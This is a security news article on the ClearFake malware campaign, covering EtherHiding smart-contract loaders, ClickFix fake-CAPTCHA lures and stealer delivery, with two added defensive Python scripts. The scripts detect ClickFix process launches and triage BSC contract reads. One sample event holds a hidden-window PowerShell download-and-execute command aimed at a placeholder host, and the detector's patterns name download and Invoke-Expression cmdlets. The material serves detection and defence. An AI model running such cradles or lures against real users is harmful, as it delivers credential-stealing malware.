ClearFake Expands Malware Tactics with Fake reCAPTCHA and Web3 Integration
The ClearFake malware campaign has evolved, now utilizing fake reCAPTCHA and Cloudflare Turnstile prompts to deceive users into downloading Lumma Stealer and Vidar Stealer.

Cybercriminals Leverage Sophisticated Techniques to Distribute Lumma and Vidar Stealers
A Growing Threat: Web3 Capabilities and ClickFix Lures
First discovered in July 2023, ClearFake spreads malware through fake browser update alerts on compromised WordPress sites. The campaign has since integrated advanced evasion techniques, including:
- EtherHiding – storing the instructions for fetching the next stage in Binance Smart Chain (BSC) smart contracts, so the payload location can be changed on-chain without touching the compromised sites.
- ClickFix Social Engineering – tricking users into running a malicious PowerShell command themselves, under the guise of fixing a technical problem or passing a "human verification" check.
- Web3 Integration – using smart contract APIs to fingerprint victims, retrieve the malicious JavaScript, and encrypt attack components.
Multi-Stage Infection Process
When a user visits a compromised website, their browser loads an intermediate JavaScript loader whose code is retrieved from the BSC contract. That loader:
1️⃣ Fingerprints the visitor's system.
2️⃣ Fetches an encrypted ClickFix payload from Cloudflare Pages.
3️⃣ Leads to stealer deployment only if the user follows the fake reCAPTCHA or Turnstile prompt and pastes the supplied PowerShell command.
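The chain ends with the victim pasting a command into the Windows Run dialog, which leaves a distinctive trace: a PowerShell or mshta process whose parent is explorer.exe, carrying download-and-execute cmdlets and window-hiding flags. The following is an added detection example written for this article (it is not code from the original page, from Sekoia, or from any vendor); it scores constructed process-creation events shaped like Sysmon Event ID 1 fields. The indicator weights, the threshold and the sample events are all assumptions made for the example.

```python
"""
Added example (not code from the original article or from Sekoia): a small
detector for the ClickFix stage described above, run over constructed
process-creation events in the shape of Sysmon Event ID 1 fields.
The ClickFix lure ends with the victim pasting a command into the Windows
Run dialog, so the telltale is a PowerShell/mshta process whose parent is
explorer.exe, with download-and-execute cmdlets and window-hiding flags.
All events below are constructed for the example; field names follow
Sysmon's (Image, ParentImage, CommandLine) but the events are invented.
"""
import re
from dataclasses import dataclass

INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# Each indicator is (label, compiled regex, weight). Assumed weights, chosen
# so that a hidden-window download cradle spawned from explorer.exe scores
# above the alert threshold while an admin's interactive shell does not.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+Bypass", re.I), 1),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), 3),
]
THRESHOLD = 4


@dataclass
class Finding:
    score: int
    reasons: list
    event: dict


def _basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return a Finding for one process-creation event (dict of Sysmon-like fields)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons, score = [], 0
    if image not in INTERPRETERS:
        return Finding(0, reasons, event)
    # Run-dialog launch: explorer.exe is the parent of whatever the user pasted.
    if parent == "explorer.exe":
        reasons.append("spawned_from_explorer")
        score += 2
    for label, rx, weight in INDICATORS:
        if rx.search(cmd):
            reasons.append(label)
            score += weight
    return Finding(score, reasons, event)


def detect_clickfix(events, threshold=THRESHOLD):
    """Return the Findings whose score reaches the alert threshold."""
    return [f for f in (score_event(e) for e in events) if f.score >= threshold]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Victim pasted the lure's command into Win+R
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/verify)"',
    },
    {   # Admin running a maintenance script from a console
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\ops\rotate-logs.ps1",
    },
    {   # Unrelated process launched from the desktop
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
    },
]

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f.score, f.reasons, f.event["CommandLine"])
```

The parent-process check is what separates ClickFix from an ordinary download cradle: a hidden-window PowerShell one-liner is suspicious anywhere, but one born from explorer.exe means a human typed or pasted it, which is exactly the behaviour the lure engineers.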
Malware Deployment and Growing Reach
ClearFake has been linked to Lumma Stealer, a widely sold Windows information stealer. In January 2025, another variation of the campaign deployed Vidar Stealer through a PowerShell loader.
According to Sekoia, over 9,300 websites have been compromised, with an estimated 200,000 users exposed to ClearFake’s malware lures in July 2024 alone.
Expanding Impact: Supply Chain Attacks and Phishing
Recent incidents highlight ClearFake’s growing impact:
Auto Dealership Breach – Attackers did not breach the dealerships directly; they compromised a third-party video service (LES Automotive) embedded on 100+ auto dealership websites, which then served ClickFix lures that deployed SectopRAT malware.
Phishing Campaigns – Threat actors have also been observed using:
- Virtual Hard Disk (VHD) attachments to spread Venom RAT.
- Excel documents exploiting CVE-2017-0199 (an Office OLE remote code execution flaw) to deploy AsyncRAT and Remcos RAT.
- Microsoft 365 misconfigurations to hijack tenant accounts for phishing and credential theft.
The Rise of Browser-in-the-Middle (BitM) Attacks
Cybersecurity firm Mandiant warns that BitM frameworks are making account hijacking easier: the victim is shown the legitimate site, but it is rendered inside a remote browser the attacker controls. The victim completes the login, multi-factor authentication included, in that browser, so the attacker ends up holding the authenticated session and its tokens without ever needing the victim's password or second factor again.
Protecting Against ClearFake and Similar Threats
To mitigate risks, organizations should:
✅ Move to phishing-resistant authentication, such as FIDO2 security keys or client certificates, to counteract Adversary-in-the-Middle (AitM) and BitM techniques; a password plus a one-time code can be relayed through an attacker's browser.
✅ Restrict PowerShell execution to trusted administrators (for example with AppLocker or WDAC and Constrained Language Mode), and alert on PowerShell or mshta launched from explorer.exe, since ClickFix depends on the user pasting a command into the Run dialog.
✅ Monitor network traffic for anomalous BSC interactions, such as workstation browsers making JSON-RPC calls to public BSC nodes when the organization has no Web3 business, and for other malware activity.
✅ Update security policies to detect evolving social engineering tactics.
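"Anomalous BSC interactions" deserves a concrete shape. A browser running an EtherHiding loader talks JSON-RPC over HTTPS to a BSC node, reading the attacker's contract with `eth_call`, and receives an ABI-encoded string containing the next stage; that is the mechanism as publicly documented for EtherHiding and is assumed here rather than taken from this article. The script below is an added example written for this page (not code from the article, from Sekoia, or from any web3 library). It scans constructed web-proxy records for contract reads to BSC RPC hosts and tallies which contract is read from how many distinct clients and referring sites, then ABI-decodes a constructed `eth_call` result the way an analyst would to see what the contract handed back. The hostnames in `BSC_RPC_HOSTS`, the placeholder contract address, and the proxy records are all assumptions made for the example.

```python
"""
Added example (not from the original article, Sekoia, or any web3 library):
triage logic for the "anomalous BSC interactions" recommendation.
(1) scan constructed web-proxy records for eth_call / eth_getCode traffic
    from workstation browsers to public BSC RPC hosts and group it by the
    contract address being read;
(2) ABI-decode a constructed eth_call result to recover the string payload.
BSC_RPC_HOSTS lists public BSC endpoints as assumed for the example; the
proxy records, contract address and hex response are constructed, not captured.
"""
import json
from collections import defaultdict

# Assumed list of public BSC JSON-RPC hostnames; extend with whatever your
# proxy actually sees. Any host answering eth_* methods is a candidate.
BSC_RPC_HOSTS = {
    "bsc-dataseed.binance.org",
    "bsc-dataseed1.binance.org",
    "bsc-dataseed2.binance.org",
}
METHODS_OF_INTEREST = {"eth_call", "eth_getCode"}


def parse_rpc_request(body):
    """Return (method, to_address) for a JSON-RPC request body, or (None, None)."""
    try:
        req = json.loads(body)
    except (TypeError, ValueError):
        return None, None
    if isinstance(req, list):          # batched request: inspect the first entry
        req = req[0] if req else {}
    if not isinstance(req, dict):
        return None, None
    method = req.get("method")
    to = None
    params = req.get("params") or []
    if params and isinstance(params[0], dict):
        to = (params[0].get("to") or "").lower()
    return method, to


def find_bsc_reads(records):
    """Group contract reads to BSC RPC hosts by contract address.

    Each record is a dict with host, method (HTTP verb), body, client, referer.
    Returns {contract: {"clients": set, "referers": set}}: one contract being
    read from many clients via many unrelated websites is the EtherHiding shape.
    """
    hits = defaultdict(lambda: {"clients": set(), "referers": set()})
    for r in records:
        if r.get("host") not in BSC_RPC_HOSTS or r.get("method") != "POST":
            continue
        rpc_method, to = parse_rpc_request(r.get("body", ""))
        if rpc_method not in METHODS_OF_INTEREST or not to:
            continue
        hits[to]["clients"].add(r.get("client"))
        hits[to]["referers"].add(r.get("referer"))
    return dict(hits)


def decode_abi_string(result_hex):
    """Decode a Solidity ABI-encoded `string` return value:
    a 32-byte head offset, a 32-byte length word, then UTF-8 bytes padded to 32."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode("utf-8")


def encode_abi_string(s):
    """Inverse of decode_abi_string; used only to build the constructed sample."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(data).to_bytes(32, "big").hex() + padded.hex()


FAKE_CONTRACT = "0x" + "ab" * 20     # constructed placeholder address, not a real contract


def _call(to):
    return json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_call",
                       "params": [{"to": to, "data": "0x"}, "latest"]})


# Constructed proxy records (not captured traffic).
SAMPLE_RECORDS = [
    {"client": "10.0.0.11", "host": "bsc-dataseed.binance.org", "method": "POST",
     "referer": "https://blog.example.invalid/", "body": _call(FAKE_CONTRACT)},
    {"client": "10.0.0.23", "host": "bsc-dataseed1.binance.org", "method": "POST",
     "referer": "https://shop.example.invalid/", "body": _call(FAKE_CONTRACT)},
    {"client": "10.0.0.23", "host": "bsc-dataseed.binance.org", "method": "POST",
     "referer": "https://shop.example.invalid/",
     "body": json.dumps({"jsonrpc": "2.0", "id": 2, "method": "eth_blockNumber", "params": []})},
    {"client": "10.0.0.42", "host": "api.example.invalid", "method": "POST",
     "referer": None, "body": _call(FAKE_CONTRACT)},
]

# Constructed eth_call result: what a contract of this kind would return.
SAMPLE_RESULT = encode_abi_string("https://stage2.example.invalid/loader.js")

if __name__ == "__main__":
    for contract, info in find_bsc_reads(SAMPLE_RECORDS).items():
        print(contract, len(info["clients"]), "clients", sorted(info["referers"]))
    print(decode_abi_string(SAMPLE_RESULT))
```

Grouping by contract rather than by client is deliberate: a single compromised site produces one client and one referer, which is easy to dismiss, whereas the same contract being read from several clients through several unrelated sites is the signature of a shared loader. Decoding the returned string is also where blocking decisions get made, since the contract output is the indicator that survives when the attacker rotates hosting.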
As ClearFake continues to evolve, its increasing reliance on Web3 technology and stealthy infection methods makes it a significant threat to businesses and users worldwide.